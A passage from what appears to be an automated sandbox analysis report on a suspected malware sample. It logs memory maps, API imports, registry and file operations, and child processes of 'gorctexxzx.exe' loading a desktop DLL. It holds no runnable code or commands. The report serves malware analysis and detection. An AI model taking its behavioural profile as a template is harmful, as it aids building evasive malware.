| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x0012ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x0042ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000004f0000 | 0x004f0000 | 0x004fffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000500000 | 0x00500000 | 0x005c7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x006d0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000006e0000 | 0x006e0000 | 0x0087ffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:29 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 99559 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #71: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #71 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllUnregisterServer /fn_args="%Temp%\IXP000.TMP\" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:36, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:53 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xea4 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
EA8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x001cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0029ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x0041ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000420000 | 0x00420000 | 0x004e7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000004f0000 | 0x004f0000 | 0x005f0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x0079ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000007a0000 | 0x007a0000 | 0x009cffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:30 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 99684 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #72: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #72 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=Entry /fn_args="%Temp%\IXP000.TMP\" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:36, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:53 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xeb0 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
EB4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
